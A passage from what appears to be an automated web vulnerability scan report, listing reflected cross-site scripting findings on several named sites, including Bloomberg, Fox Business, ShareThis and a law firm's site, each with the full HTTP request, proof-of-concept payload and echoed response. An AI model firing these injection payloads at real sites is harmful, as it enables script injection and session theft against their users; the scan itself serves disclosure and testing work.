Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:52 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=9215002402228905964&fpid=25886"><script>alert(1)</script>8c27d2a8f82&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.116. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f36b"><script>alert(1)</script>cf6a02d7684 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=4f36b"><script>alert(1)</script>cf6a02d7684&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775;
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:54 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:53 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4321036613896989359&fpid=4&nu=n&t=&sp=4f36b"><script>alert(1)</script>cf6a02d7684&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.117. http://video.foxbusiness.com/v/feed/video/4674822.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxbusiness.com
Path:   /v/feed/video/4674822.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 12a45<script>alert(1)</script>f3c8e235d87 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4674822.js?callback=videoPlayer.feed.parse_2284764g_dioediv12a45<script>alert(1)</script>f3c8e235d87&template=grab&cb=20115127 HTTP/1.1
Host: video.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3952
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Thu, 12 May 2011 11:38:37 GMT
Connection: close

videoPlayer.feed.parse_2284764g_dioediv12a45<script>alert(1)</script>f3c8e235d87({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Thu, 12 May 2011 07:38:37 EDT","lastBuildDate":"Thu, 12 May 2011 07:38:37 EDT","generato
...[SNIP]...

4.118. http://wd.sharethis.com/api/getCount2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload ea400<script>alert(1)</script>b2c22e0c34a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getCount2.php?cb=stButtons.processCBea400<script>alert(1)</script>b2c22e0c34a&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 401

stButtons.processCBea400<script>alert(1)</script>b2c22e0c34a({"url":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/","total":0,"ourl":"http:\/\/www.mimec
...[SNIP]...

4.119. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bfa1d<img%20src%3da%20onerror%3dalert(1)>865705b3363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfa1d<img src=a onerror=alert(1)>865705b3363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Directo/bfa1d<img%20src%3da%20onerror%3dalert(1)>865705b3363r%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 273

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Directo\/bfa1d<img src=a onerror=alert(1)>865705b3363r\/"});

4.120. http://wd.sharethis.com/api/getCount2.php [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 43cd7<img%20src%3da%20onerror%3dalert(1)>8a9a606e3bb was submitted in the url parameter. This input was echoed as 43cd7<img src=a onerror=alert(1)>8a9a606e3bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F43cd7<img%20src%3da%20onerror%3dalert(1)>8a9a606e3bb HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 271

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/43cd7<img src=a onerror=alert(1)>8a9a606e3bb"});

4.121. http://webezines.kwithost.com/sx25Feed.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webezines.kwithost.com
Path:   /sx25Feed.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bfa61<script>alert(1)</script>31dea62f86d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sx25Feed.php?keyword=Investment%20Firms&format=json&callback=jsonp1305198220594bfa61<script>alert(1)</script>31dea62f86d&_=1305198220619 HTTP/1.1
Host: webezines.kwithost.com
Proxy-Connection: keep-alive
Referer: http://investmentfirmsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:45 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 2044
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305198220594bfa61<script>alert(1)</script>31dea62f86d([{"content_title":"Dodd-Frank Act: Hedge Funds and <b>Investment<\/b> Advisory <b>Firms<\/b>","content_main_content":"The Dodd-Frank Act pro
...[SNIP]...

4.122. http://wolfgreenfield.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139d0"><script>alert(1)</script>9e5f6c5a037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico139d0"><script>alert(1)</script>9e5f6c5a037 HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:58 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/favicon.ico139d0"><script>alert(1)</script>9e5f6c5a037');" title="Email Page">
...[SNIP]...

4.123. http://wolfgreenfield.com/v_arrow.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848c5"><script>alert(1)</script>79cf0510bfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v_arrow.gif848c5"><script>alert(1)</script>79cf0510bfd HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:57 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/v_arrow.gif848c5"><script>alert(1)</script>79cf0510bfd');" title="Email Page">
...[SNIP]...

4.124. http://wolfgreenfield.com/v_arrow.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4fda"><script>alert(1)</script>49e11abb79a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v_arrow.gif?c4fda"><script>alert(1)</script>49e11abb79a=1 HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:56 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/v_arrow.gif?c4fda"><script>alert(1)</script>49e11abb79a=1');" title="Email Page">
...[SNIP]...

4.125. http://www.bloomberg.com/apps/data [sgid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /apps/data

Issue detail

The value of the sgid request parameter is copied into the HTML document as plain text between tags. The payload c716b<script>alert(1)</script>0bd294ae9c6 was submitted in the sgid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apps/data?pid=trackstoryhits&sgid=LKOO7G0UQVI901c716b<script>alert(1)</script>0bd294ae9c6 HTTP/1.1
Host: www.bloomberg.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; profFbannerad=1; prodFbannerad=1; _chartbeat2=05vt53emlalrxzsu; opt=no-opt; __utmx=30057196.00013155880168891469:4:9; __utmxx=30057196.00013155880168891469:3825137:2592000; s_sess=%20s_ria%3Dflash%257CSilverlight%25204.0%3B%20s_cc%3Dtrue%3B%20ev1%3Dnews%253Asports%3B%20s_v20%3D2011-05-05%25252000%25253A00%25253A52%252520-0400%3B%20s_sq%3D%3B; DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; rsi_segs=K05539_10579|K05539_10529|K05539_10592; BT=10579&10529&10592; quint386uid=11486149183474481; oo_inv_percent=0; oo_inv_hit=1; __utma=30057196.790518761.1303930135.1303930135.1305200254.2; __utmc=30057196; __utmv=30057196.|2=201012_more_stories=9=1,3=opt=no-opt=1,; __utmb=30057196.5.7.1305200255961

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Cache-Control: max-age=900
Content-Type: text/plain
Content-Length: 71
Date: Thu, 12 May 2011 11:37:51 GMT
Connection: close


Error sgid=LKOO7G0UQVI901c716b<script>alert(1)</script>0bd294ae9c6


4.126. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a893"style%3d"x%3aexpression(alert(1))"7e08a33da53 was submitted in the REST URL parameter 3. This input was echoed as 7a893"style="x:expression(alert(1))"7e08a33da53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/80868dabe98107a18525708000086fe17a893"style%3d"x%3aexpression(alert(1))"7e08a33da53/$NavImagemap/0.52?OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:22:01 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9368
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - 80868dabe98107a18525708000086fe17a893"style="x:expression(alert(1))"7e08a33da53/$NavImagemap/0.52">
...[SNIP]...

4.127. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31990"%3b533bbbd2843 was submitted in the REST URL parameter 5. This input was echoed as 31990";533bbbd2843 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.5231990"%3b533bbbd2843?OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:22:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9274
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<!--
document._domino_target = "_self";
function _doClick(v, o, t) {
var url="/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.5231990";533bbbd2843?OpenElement&FieldElemFormat=gif&Click=" + v;
if (o.href != null)
o.href = url;
else {
if (t == null)
t = document._domino_target;
window.open(url, t);
}

}
// -->
...[SNIP]...

4.128. http://www.butlerrubin.com/web/br.nsf/index [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf370"style%3d"x%3aexpression(alert(1))"4fa2751b636 was submitted in the REST URL parameter 3. This input was echoed as bf370"style="x:expression(alert(1))"4fa2751b636 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/indexbf370"style%3d"x%3aexpression(alert(1))"4fa2751b636?openform HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9278
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - indexbf370"style="x:expression(alert(1))"4fa2751b636">
...[SNIP]...

4.129. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64fac"style%3d"x%3aexpression(alert(1))"7790debee61 was submitted in the REST URL parameter 3. This input was echoed as 64fac"style="x:expression(alert(1))"7790debee61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web64fac"style%3d"x%3aexpression(alert(1))"7790debee61/br.nsf/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web64fac"style="x:expression(alert(1))"7790debee61/br.nsf/home_btn_01ov.jpg">
...[SNIP]...

4.130. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26672"style%3d"x%3aexpression(alert(1))"fe0666a8b66 was submitted in the REST URL parameter 4. This input was echoed as 26672"style="x:expression(alert(1))"fe0666a8b66 in the application's response.

